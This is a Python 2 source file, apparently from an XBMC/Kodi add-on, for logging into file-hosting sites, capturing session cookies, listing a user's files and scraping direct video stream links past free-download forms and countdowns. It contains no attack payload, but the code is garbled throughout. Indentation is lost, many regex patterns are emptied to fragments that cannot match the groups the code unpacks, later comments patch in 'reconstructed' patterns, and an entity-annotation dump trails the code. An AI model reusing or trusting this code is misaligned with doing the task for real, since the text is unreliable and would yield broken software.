#
class xfilesharing(cloudservice.cloudservice):
# magic numbers
MEDIA_TYPE_VIDEO = 1
MEDIA_TYPE_FOLDER = 0
##
# initialize (setting 1) username, 2) password, 3) authorization token, 4) user agent string
##
def __init__(self, name, domain, user, password, auth, user_agent):
return super(xfilesharing,self).__init__(name, domain, user, password, auth, user_agent)
#return cloudservice.__init__(self,domain, user, password, auth, user_agent)
##
# perform login
##
def login(self):
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
# default User-Agent ('Python-urllib/2.6') will *not* work
opener.addheaders = [('User-Agent', self.user_agent)]
if self.domain == 'uptostream.com':
self.domain = 'uptobox.com'
if 'http://' in self.domain:
url = self.domain
else:
url = 'http://' + self.domain + '/'
values = {
'op' : 'login',
'login' : self.user,
'redirect' : url,
'password' : self.password
}
# try login
try:
response = opener.open(url,urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403:
#login denied
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))
log(str(e), True)
return
response_data = response.read()
response.close()
loginResult = False
#validate successful login
for r in re.finditer('my_account',
response_data, re.DOTALL):
loginResult = True
#validate successful login
for r in re.finditer('logout',
response_data, re.DOTALL):
loginResult = True
if (loginResult == False):
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))
log('login failed', True)
return
for cookie in self.cookiejar:
for r in re.finditer(' ([^\=]+)\=([^\s]+)\s',
str(cookie), re.DOTALL):
cookieType,cookieValue = r.groups()
if cookieType == 'xfss':
self.auth = cookieValue
if cookieType == 'xfsts':
self.auth = cookieValue
return
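# Editor's sketch: the cookie scan above in isolation, run on an invented
# cookiejar repr line. The captured xfss/xfsts value is what lands in
# self.auth and is replayed by getHeadersList() below.
def _example_cookie_scan():
    line = '<Cookie xfss=0a1b2c3d4e for example.com/>'
    m = re.search(' ([^\=]+)\=([^\s]+)\s', line)
    return m.groups()   # ('xfss', '0a1b2c3d4e')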
##
# return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie
# returns: list containing the header
##
def getHeadersList(self,referer=''):
if ((self.auth != '' or self.auth != 0) and referer == ''):
return { 'User-Agent' : self.user_agent, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' }
elif (self.auth != '' or self.auth != 0):
return { 'User-Agent' : self.user_agent, 'Referer': referer, 'Cookie' : 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';' }
else:
return { 'User-Agent' : self.user_agent }
##
# return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie
# returns: URL-encoded header string
##
def getHeadersEncoded(self, referer=''):
return urllib.urlencode(self.getHeadersList(referer))
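# Editor's note: the URL-encoded headers above are meant to be appended to a
# stream URL after a '|' separator, which is how XBMC/Kodi passes HTTP headers
# to its player; getPublicLink() below builds exactly streamURL + '|' + headers.
# A sketch with invented values:
#
#   headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0', 'Cookie': 'xfss=abc'})
#   xbmc.Player().play('http://example.com/v.mp4' + '|' + headers)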
##
# retrieve a list of videos, using playback type stream
# parameters: prompt for video quality (optional), cache type (optional)
# returns: list of videos
##
def getVideosList(self, folderID=0, cacheType=0):
if 'http://' in self.domain:
url = self.domain
else:
url = 'http://' + self.domain
if 'streamcloud.eu' in self.domain:
url = url + '/'
# retrieve all documents
if folderID == 0:
url = url+'?op=my_files'
else:
url = url+'?op=my_files&fld_id='+folderID
videos = {}
if True:
req = urllib2.Request(url, None, self.getHeadersList())
# if action fails, validate login
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
log(str(e), True)
return
else:
log(str(e), True)
return
response_data = response.read()
response.close()
for r in re.finditer('placeholder\=\"(Username)\" id\=i\"(nputLoginEmail)\" name\=\"login\"' ,
response_data, re.DOTALL):
loginUsername,loginUsernameName = r.groups()
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
log(str(e), True)
return
response_data = response.read()
response.close()
# parsing page for videos
# video-entry
for r in re.finditer('([^\<]+) ' ,
response_data, re.DOTALL):
fileID,url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
for r in re.finditer(' ([^\<]+)' ,
response_data, re.DOTALL):
url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
# video-entry - bestream
for r in re.finditer('[^\<]+([^\<]+) ' ,
response_data, re.DOTALL):
url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
# video-entry - uptobox
for r in re.finditer(' ([^\<]+) ' ,
response_data, re.DOTALL):
url,fileName = r.groups()
# streaming
videos[fileName] = {'url': 'plugin://plugin.video.cloudstream?mode=streamURL&instance='+self.instanceName+'&url=' + url, 'mediaType' : self.MEDIA_TYPE_VIDEO}
if 'realvid.net' in self.domain:
for r in re.finditer('([^\<]+) \s+' ,
response_data, re.DOTALL):
url,fileName = r.groups()
#flatten folders (no clean way of handling subfolders, so just make the root list all folders & subfolders
#therefore, skip listing folders if we're not in root
# if folderID == 0:
# folder-entry
# for r in re.finditer('([^\<]+) ' ,
# folderID = 0
# for r in re.finditer('([^\<]+) ' ,
# response_data, re.DOTALL):
# folderID,folderName = r.groups()
#remove from folderName
# folderName = re.sub('\ \;', '', folderName)
# folder
# if int(folderID) != 0:
# videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER}
# if folderID == 0:
for r in re.finditer('([^\<]+) ' ,
response_data, re.DOTALL):
folderID,folderName = r.groups()
# folder
if int(folderID) != 0 and folderName != ' . . ':
videos[folderName] = {'url': 'plugin://plugin.video.cloudstream?mode=folder&instance='+self.instanceName+'&folderID=' + folderID, 'mediaType' : self.MEDIA_TYPE_FOLDER}
return videos
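# A minimal usage sketch (editor's illustration): listing an account's videos
# on one of the supported hosts. The host and credentials are invented; each
# entry carries a plugin:// URL plus a mediaType flag (file vs. folder).
#
#   service = xfilesharing('uptobox', 'uptobox.com', 'user', 'secret', '', 'Mozilla/5.0')
#   service.login()
#   for title, entry in service.getVideosList().items():
#       print title, entry['mediaType'], entry['url']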
##
# retrieve a video link
# parameters: title of video, whether to prompt for quality/format (optional), cache type (optional)
# returns: list of URLs for the video or single URL of video (if not prompting for quality)
##
def getPublicLink(self,url,cacheType=0):
fname = ''
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
opener.addheaders = [ ('User-Agent' , self.user_agent)]
req = urllib2.Request(url)
try:
response = opener.open(req)
response.close()
url = response.url
except urllib2.URLError, e:
pass  # on failure keep the caller-supplied url; 'response' only exists on success
# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar), MyHTTPErrorProcessor)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=english; login='+self.user+'; xfsts='+self.auth+'; xfss='+self.auth+';')]
req = urllib2.Request(url)
# if action fails, validate login
try:
response = opener.open(req)
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = opener.open(req)
except urllib2.URLError, e:
log(str(e), True)
return ('','')
else:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
for r in re.finditer('\([^\<]+)\<',
response_data, re.DOTALL | re.I):
title = r.group(1)
if fname == '':
fname = title
url = response.url
req = urllib2.Request(url)
for r in re.finditer('name\=\""(code)\"" class\=\""(captcha_code)' ,
response_data, re.DOTALL):
loginUsername,loginUsernameName = r.groups()
self.login()
req = urllib2.Request(url, None, self.getHeadersList())
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
if self.domain == 'vidzi.tv':
for r in re.finditer('(file)\: \""([^\""]+)\.mp4\""' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
return (streamURL + '.mp4', fname)
confirmID = 0
values = {}
# fetch video title, download URL and docid for stream link
for r in re.finditer(' .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,usr_login,id,fname,referer = r.groups()
values = {
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'method_free' : 'Free Download'
}
for r in re.finditer(' .*? .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,usr_login,id,fname,referer,hash,submit = r.groups()
values = {
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'hash' : hash,
'imhuman' : submit
}
for r in re.finditer(' .*? .*? .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,usr_login,id,fname,referer,hash,inhu,submit = r.groups()
values = {
'_vhash' : 'i1102394cE',
'gfk' : 'i22abd2449',
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'hash' : hash,
'inhu' : inhu,
'imhuman' : submit
}
for r in re.finditer(' .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,referer,submit = r.groups()
values = {
'op' : op,
'id' : id,
'referer' : referer,
'method_free' : submit,
'download_direct' : 1
}
for r in re.finditer(' .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,rand,referer,submit = r.groups()
values = {
'op' : op,
'id' : id,
'rand' : rand,
'referer' : referer,
'method_free' : submit,
'download_direct' : 1
}
for r in re.finditer(' .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
ipcount,op,usr_login,id,fname,referer = r.groups()
values = {
'ipcount_val' : ipcount,
'op' : op,
'usr_login' : usr_login,
'id' : id,
'fname' : fname,
'referer' : referer,
'method_free' : 'Slow access'
}
values = {}
variable = 'op'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'usr_login'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'id'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'fname'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'referer'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'hash'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'inhu'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'method_free'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'method_premium'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'rand'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'down_direct'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'file_size_real'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'imhuman'
for r in re.finditer(' ' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = 'gfk'
for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
variable = '_vhash'
for r in re.finditer('(name): \''+variable+'\', value: \'([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
values[variable] = value
# values['referer'] = ''
for r in re.finditer(' .*? .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,rand,referer,plugins,submit = r.groups()
values = {
'op' : op,
'id' : id,
'rand' : rand,
'referer' : referer,
'plugins_are_not_allowed' : plugins,
'method_free' : submit,
'download_direct' : 1
}
# req = urllib2.Request(url, urllib.urlencode(values), self.getHeadersList(url))
req = urllib2.Request(url)
if self.domain == 'thefile.me':
values['method_free'] = 'Free Download'
elif self.domain == 'sharesix.com':
values['method_free'] = 'Free'
elif 'streamcloud.eu' in self.domain:
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(10))
xbmc.sleep((int(10)+1)*1000)
elif self.domain == 'vidhog.com':
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(15))
xbmc.sleep((int(15)+1)*1000)
elif self.domain == 'vidto.me':
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(6))
xbmc.sleep((int(6)+1)*1000)
elif self.domain == 'vodlocker.com':
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(3))
xbmc.sleep((int(3)+1)*1000)
elif self.domain == 'hcbit.com':
try:
# response = urllib2.urlopen(req)
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
log(str(e), True)
return ('', '')
else:
log(str(e), True)
return ('', '')
try:
if response.info().getheader('Location') != '':
return (response.info().getheader('Location') + '|' + self.getHeadersEncoded(url), fname)
except:
for r in re.finditer('\'(file)\'\,\'([^\']+)\'' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
return (streamURL + '|' + self.getHeadersEncoded(url), fname)
for r in re.finditer('\([^\<]+)\<\/td\>' ,response_data, re.DOTALL):
deliminator,fileName = r.groups()
for r in re.finditer('(\|)([^\|]{42})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName
return (streamURL + '|' + self.getHeadersEncoded(url), fname)
if self.domain == 'bestreams.net':
file_id = ''
aff = ''
variable = 'file_id'
for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
file_id = value
variable = 'aff'
for r in re.finditer('\''+variable+'\', (\')([^\']*)\'' ,response_data, re.DOTALL):
hidden,value = r.groups()
aff = value
xbmc.sleep((int(2)+1)*1000)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
opener.addheaders = [ ('User-Agent' , self.user_agent), ('Referer', url), ('Cookie', 'lang=1; file_id='+file_id+'; aff='+aff+';')]
elif self.domain == 'thevideo.me':
for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
return (streamURL,fname)
elif self.domain == 'vidzi.tv':
for r in re.finditer('\s+file:\s+\""([^\""]+)\""',
response_data, re.DOTALL):
streamURL = r.group(1)
return (streamURL,fname)
# if action fails, validate login
try:
# response = urllib2.urlopen(req)
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
log(str(e), True)
return ('','')
else:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
op=''
for r in re.finditer(' .*? .*? .*? .*? ' ,response_data, re.DOTALL):
op,id,rand,referer,submit = r.groups()
values = {
'op' : op,
'id' : id,
'rand' : rand,
'referer' : referer,
'method_free' : submit,
'download_direct' : 1
}
streamURL=''
title = ''
for r in re.finditer('\<(title)\>([^\>]*)\<\/title\>' ,response_data, re.DOTALL):
titleID,title = r.groups()
# for thefile
if self.domain == 'thefile.me':
downloadAddress = ''
for r in re.finditer('\<(img) src\=\""http\:\/\/([^\/]+)\/[^\""]+\"" style' ,response_data, re.DOTALL):
downloadTag,downloadAddress = r.groups()
for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://'+str(downloadAddress)+'/d/'+fileID+'/video.mp4'
elif self.domain == 'sharerepo.com':
for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
for r in re.finditer('(\|)([^\|]{60})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://37.48.80.43/d/'+fileID+'/video.mp4?start=0'
elif self.domain == 'filenuke.com':
for r in re.finditer('(\|)([^\|]{56})\|' ,response_data, re.DOTALL):
deliminator,fileID = r.groups()
streamURL = 'http://37.252.3.244/d/'+fileID+'/video.flv?start=0'
elif self.domain == 'sharerepo.com':
for r in re.finditer('(file)\: \'([^\']+)\'\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
elif self.domain == 'letwatch.us':
for r in re.finditer('\[IMG\]http://([^\/]+)\/',
response_data, re.DOTALL):
IP = r.group(1)
for r in re.finditer('\|([^\|]{60})\|',
response_data, re.DOTALL):
fileID = r.group(1)
streamURL = 'http://'+IP+'/'+fileID+'/v.flv'
elif self.domain == 'thevideo.me':
for r in re.finditer('\,\s+\'file\'\s+\:\s+\'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'vidto.me':
for r in re.finditer('var file_link = \'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'allmyvideos.net':
for r in re.finditer('\""file\"" : \""([^\""]+)\""',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'realvid.net':
for r in re.finditer('file:\s?\'([^\']+)\'',
response_data, re.DOTALL):
streamURL = r.group(1)
elif self.domain == 'uptobox.com' or self.domain == 'uptostream.com':
# best-effort reconstruction of a corrupted pattern: the direct download
# anchor on the uptobox/uptostream result page
for r in re.finditer('<a href="(https?://[^"]+)"[^>]*>\s*Download',
response_data, re.DOTALL):
streamURL = r.group(1)
return (streamURL, fname)
timeout = 0
# best-effort reconstruction of a corrupted pattern: countdown text such as
# <span id="...">NN</span> seconds
for r in re.finditer('<span id="([^"]+)">(\d+)</span> seconds' ,response_data, re.DOTALL):
id,timeout = r.groups()
# best-effort reconstruction of a corrupted pattern: inline error box
for r in re.finditer('<div class="(err[^"]*)"[^>]*>(.*?)</div>' ,response_data, re.DOTALL):
id,error = r.groups()
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), error)
return ('','')
req = urllib2.Request(url)
if int(timeout) > 0:
xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(timeout))
xbmc.sleep((int(timeout)+1)*1000)
# if action fails, validate login
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
if e.code == 403 or e.code == 401:
self.login()
try:
response = opener.open(req, urllib.urlencode(values))
except urllib2.URLError, e:
log(str(e), True)
return ('','')
else:
log(str(e), True)
return ('','')
response_data = response.read()
response.close()
# best-effort reconstruction of a corrupted pattern: the final download link
for r in re.finditer('href="([^"]+)"[^>]*>(Click here to start your download)' ,response_data, re.DOTALL):
streamURL,downloadlink = r.groups()
#vodlocker.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('(file)\: \""([^\""]+)""\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
if 'mp4' in streamURL:
break
# mightyupload.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('var (file_link) = \'([^\']+)\'' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
# vidhog.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('(product_download_url)=([^\']+)\'' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
# vidspot.net
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('""(file)"" : ""([^\""]+)""\,' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
# uploadc.com
if streamURL == '':
# fetch video title, download URL and docid for stream link
for r in re.finditer('\'(file)\',\'([^\']+)\'\)\;' ,response_data, re.DOTALL):
streamType,streamURL = r.groups()
streamURL = streamURL + '|' + self.getHeadersEncoded(url)
# return 'http://93.120.27.PI:KEY.mp4'
return (streamURL, fname)
class MyHTTPErrorProcessor(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
code, msg, hdrs = response.code, response.msg, response.info()
# only add this line to stop 302 redirection.
if code == 302: return response
if not (200 <= code < 300):
response = self.parent.error(
'http', request, response, code, msg, hdrs)
return response
https_response = http_response
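# Usage sketch (illustrative): installing this processor lets the caller
# inspect a 302 response directly instead of having urllib2 follow it:
# opener = urllib2.build_opener(MyHTTPErrorProcessor)
# response = opener.open(request)
# if response.code == 302:
# location = response.info().getheader('Location')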
",33648,"[['URL', ""http://cloud1.hcbit.com/cgi-bin/dl.cgi/'+fileID+'/'+fileName""], ['DATE_TIME', '2013-2014'], ['LOCATION', 'xbmcaddon'], ['LOCATION', 'xbmcgui'], ['URL', 'xbmcaddon.Ad'], ['PERSON', 'LOGERROR'], ['PERSON', 'LOGDEBUG'], ['PERSON', 'MEDIA_TYPE_VIDEO'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'self.do'], ['URL', 'self.do'], ['PERSON', 'self.user'], ['URL', 'self.pa'], ['URL', 'e.co'], ['PERSON', 're.finditer'], ['PERSON', 'FireDrive'], ['PERSON', 'Referer'], ['PERSON', 'FireDrive'], ['LOCATION', 'getHeadersEncoded(self'], ['URL', 'self.ge'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'streamcloud.eu'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'realvid.net'], ['URL', 'r.gr'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'plugin.video.cl'], ['URL', 'self.in'], ['URL', 'self.ME'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['URL', 'urllib2.Re'], ['URL', 'response.cl'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'self.us'], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 're.fi'], ['URL', 'urllib2.Re'], ['URL', 'self.ge'], ['URL', 'r.gr'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', 'fname'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'imhuman'], ['LOCATION', 'fname'], ['PERSON', 'inhu'], ['PERSON', 'imhuman'], ['URL', 'urllib2.Re'], ['LOCATION', 'self.getHeadersList(url'], ['URL', 'self.ge'], ['URL', 'urllib2.Re'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 'e.co'], ['URL', 'self.ge'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 're.fi'], ['LOCATION', ""re.finditer('(\\|)([^\\|]{42})\\|""], ['URL', 'self.ge'], ['PERSON', 'fname'], ['URL', 'self.do'], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['NRP', 'file_id'], ['LOCATION', ""re.finditer('\\''+variable+'\\""], ['URL', 'urllib2.HT'], ['URL', 'self.co'], ['URL', 'opener.ad'], ['PERSON', 'Referer'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'e.co'], ['DATE_TIME', ""re.finditer('\\<(title)\\>([^\\>]*)\\<\\/title\\""], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'video.mp'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 'r.gr'], ['URL', 're.fi'], ['PERSON', 'strong>(\\d+) seconds\''], ['URL', 'urllib2.Re'], ['URL', 'e.co'], ['URL', 'r.gr'], ['URL', 'vodlocker.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'mightyupload.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidhog.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'vidspot.net'], ['URL', 
're.fi'], ['LOCATION', '^\\""]+)""\\'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'uploadc.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.ge'], ['URL', 'KEY.mp'], ['URL', 'urllib2.HT'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', '37.48.80.43'], ['IP_ADDRESS', '37.252.3.244'], ['URL', 'plugin.video.cl'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'cloudservice.cl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 'self.do'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'self.us'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'self.co'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'self.do'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'self.do'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.fi'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.su'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.us'], ['URL', 'self.us'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 'self.do'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 